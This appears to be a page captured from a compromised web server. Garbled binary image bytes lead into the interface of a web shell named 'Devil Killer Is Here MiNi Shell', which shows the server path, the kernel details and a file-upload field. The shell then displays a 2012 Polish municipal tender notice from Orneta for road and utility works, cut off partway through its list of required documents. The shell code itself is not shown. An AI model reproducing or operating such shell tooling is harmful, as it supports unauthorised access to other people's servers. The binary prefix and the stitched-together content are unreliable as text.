JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120504/141774-N-2012.html

<p class="kh_header"><b>Orneta: Zaprojektowanie i wykonanie robót budowlanych dla Projektu: Kompleksowe przygotowanie terenów inwestycyjnych przy ul. Przemysłowej w Ornecie.</b><br>
<b>Numer ogłoszenia: 141774 - 2012; data zamieszczenia: 04.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych dla Projektu: Kompleksowe przygotowanie terenów inwestycyjnych przy ul. Przemysłowej w Ornecie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych  dla Projektu: Kompleksowe przygotowanie terenów inwestycyjnych przy ul.  Przemysłowej w Ornecie,  który realizowany będzie w formule zaprojektuj i wybuduj  zwanego dalej  Projektem. 
Projekt, polega na przygotowaniu terenów inwestycyjnych zlokalizowanych w połud. - wsch. części Ornety, na połud. od ul. 1 Maja - drogi woj. Nr 513, na połud. - zach. od ul. Dworcowej, na wsch. od ul. Olsztyńskiej - drogi woj. Nr 507 poprzez budowę elementów infrastruktury technicznej t.j. sieci uzbrojenia podziemnego oraz budowę i rozbudowę odcinków dróg obsługujące w/w tereny. 
2.Zakres przedmiotu zamówienia obejmuje:
1)opracowanie kompletnej dokumentacji projektowej  i uzyskanie wszystkich niezbędnych opinii, uzgodnień, pozwoleń i decyzji administracyjnych zezwalających na rozpoczęcie robót w tym: decyzji pozwolenia na budowę, decyzji o zezwoleniu na realizację inwestycji drogowej;  
2)wykonanie robót budowlanych w oparciu o opracowaną i zatwierdzoną dokumentację projektową i obejmujących:
A) w zakresie robót, związanych z budową sieci uzbrojenia podziemnego:
a)budowę sieci wodociągowej 
b)budowę sieci  kanalizacji sanitarnej 
c)budowę sieci teletechnicznej 
B)w zakresie robót, związanych z budową, rozbudową dróg:
a)rozbudowę i budowę drogi klasy Z wraz z zawrotką i 2 zatokami autobusowymi stanowiącej odcinek ul. Przemysłowej;  budowę drogi klasy L łączącej ul. Przemysłową z ul. Dworcową; rozbudowę drogi klasy D łączącej ul. Przemysłową z ul. Olsztyńską (droga wojewódzka Nr 507); rozbudowę drogi klasy D  zakończonej zawrotką biegnącej od ul. Przemysłowej, po jej południowej stronie i stanowiącej dojazd do nieruchomości zlokalizowanych po jej obu stronach  
w zakresie wykonania: 
- korpusu drogowego, 
- podbudowy, 
- jezdni z chodnikami i ścieżkami rowerowymi , zieleni drogowej i nasadzeń
b)budowę ciągu pieszego przy działce  nr 162/2,
c)budowę przepustu pod drogą w km ok.  0+320 drogi łączącej ul. Przemysłowa z ul. Olsztyńska , 
d)budowę kanalizacji deszczowej 
e)budowę kanałów technologicznych ,
f)budowę oświetlenia ulicznego,
g)urządzenia bezpieczeństwa ruchu
3.Szczegółowy opis przedmiotu zamówienia został przedstawiony  w Części III SIWZ Opis przedmiotu zamówienia
4. Roboty w  ramach  tego zamówienia  prowadzone będą  zgodnie z  WARUNKAMI KONTRAKTOWYMI DLA URZĄDZEŃ ORAZ PROJEKTOWANIA i BUDOWY dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych i budowlanych projektowanych przez Wykonawcę , opublikowane przez Międzynarodową Federację Inżynierów Konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 311, CH-1215 Geneva 15, Szwajcaria, drugie wydanie angielsko-polskie 2004, Tłumaczenie pierwszego wydania 1999 (tzw żółty FIDIC)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp . Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.31.20-6, 45.23.13.00-8, 45.23.21.30-2, 45.23.21.52-2, 45.23.14.00-9, 45.31.61.10-9, 45.23.23.00-5, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium 
Wysokość wadium 100 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(W przypadku oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie).
W tym zakresie zamawiający wymaga, aby wykonawca wykazał, że :
1)w okresie ostatnich trzech lat przed upływem terminu składania ofert , a  jeżeli 
okres prowadzenia działalności jest  krótszy  w  tym okresie wykonał należycie co najmniej jedną lub więcej usług projektowania polegających na opracowaniu dokumentacji projektowej (w zakresie co najmniej projektu budowlanego) spełniającej łącznie następujące warunki :  
a)łączny zakres rzeczowy co najmniej 1 lub więcej opracowanych dokumentacji 
projektowych  obejmował co najmniej : branżę drogową, sanitarną i elektryczną
b) i łączna wartość brutto co najmniej 1 lub więcej opracowanych dokumentacji 
projektowych  nie mniejsza  niż  300 000 zł  
2)w okresie ostatnich pięciu lat przed upływem terminu składania  ofert , a  jeżeli 
okres prowadzenia działalności jest  krótszy  w  tym okresie wykonał zgodnie z 
zasadami sztuki budowlanej i prawidłowo zakończył co najmniej: 
a)jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie   drogi klasy co najmniej D o nawierzchni bitumicznej, o długości min. 1,0 km,
b)jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie sieci kanalizacji sanitarnej i/lub kanalizacji deszczowej o łącznej długości odcinków min. 1,0 km,
c)jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie oświetlenia ulicznego - o długości min. 1,0 km.
Zamawiający dopuszcza spełnienie warunku podanego w pkt 2) poprzez wykazanie się przez Wykonawcę wykonaniem mniejszej ilości robót budowlanych, tj. jednej lub dwóch, które swym zakresem odpowiadają wymaganiom określonym przez Zmawiającego.
Wykazane przez Wykonawcę usługi i roboty budowlane muszą być zakończone i odebrane przez ich zleceniodawców. 
W celu potwierdzenia spełniania wyżej wymienionego warunku udziału w postępowaniu należy złożyć wykaz wykonanych usług w okresie ostatnich 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców sporządzony według wzoru stanowiącego załącznik nr 4 do IDW, oraz załączeniem dokumentu potwierdzającego, że  te usługi zostały wykonane należycie i wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat,  przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie z podaniem ich rodzaju i wartości, daty i miejsca wykonania sporządzony według wzoru stanowiącego załącznik nr 4a do IDW oraz załączeniem dokumentu potwierdzającego, że te roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(W przypadku oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie).
W tym zakresie zamawiający wymaga, aby wykonawca wykazał, że dysponuje lub będzie dysponował osobami posiadającymi  następujące kwalifikacje zawodowe i doświadczenie tj. 
1)co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa, posiadającą minimum 4 letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub kierownika robót drogowych
2)co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa, posiadającą minimum 4-letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub  kierownika robót sanitarnych. 
3)co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa, posiadającą minimum 4 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub kierownika robót elektrycznych. 
4) co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa, posiadającą minimum 4 letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub kierownika robót teletechnicznych. 
5) co najmniej jedną  osobą posiadającą  uprawnienia budowlane do projektowania w specjalności drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa; posiadającą minimum 5 letnie doświadczenie zawodowe w projektowaniu.
6) co najmniej jedną  osobą  posiadającą  uprawnienia  budowlane  do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa; posiadającą minimum 5 letnie doświadczenie zawodowe w projektowaniu.
7) co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa; posiadającą minimum 5 letnie doświadczenie zawodowe w projektowaniu.
8) co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa; posiadającą minimum 5 letnie doświadczenie zawodowe w projektowaniu.
UWAGA: 
1)Przez doświadczenie zawodowe (w przypadku stanowisk, dla których wymagane jest posiadanie uprawnień budowlanych) należy rozumieć okres od daty uzyskania stosownych uprawnień do daty składania oferty.
2)Zamawiający dopuszcza możliwość łączenia maksymalnie 2 funkcji  przez 1 osobę pod warunkiem, gdy przewidziana przez Wykonawcę dana osoba posiada łącznie wymagane: kwalifikacje zawodowe i  doświadczenie zawodowe. 
3)Osoby będące obywatelami krajów członkowskich Unii Europejskiej, a wskazane jako osoby od których wymagane są stosowne uprawnienia budowlane, powinny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia - zgodnie z Ustawą z dnia 18 marca 2008r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z 2008 roku nr 63, poz.394).
W celu potwierdzenia spełniania wyżej wymienionego warunku udziału w postępowaniu należy złożyć wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami sporządzony według wzoru stanowiącego załącznik nr 5 do IDW, oraz oświadczenia że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane sporządzonego według wzoru stanowiącego załącznik nr 6 do IDW  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(W przypadku oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie).
W tym zakresie zamawiający wymaga, aby wykonawca wykazał, że:
1) posiada środki finansowe lub zdolność kredytową w wysokości minimum 3 000 000 zł  
2)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 3 000 000 zł.   
W celu potwierdzenia spełniania wyżej wymienionego warunku udziału w postępowaniu należy złożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert oraz opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
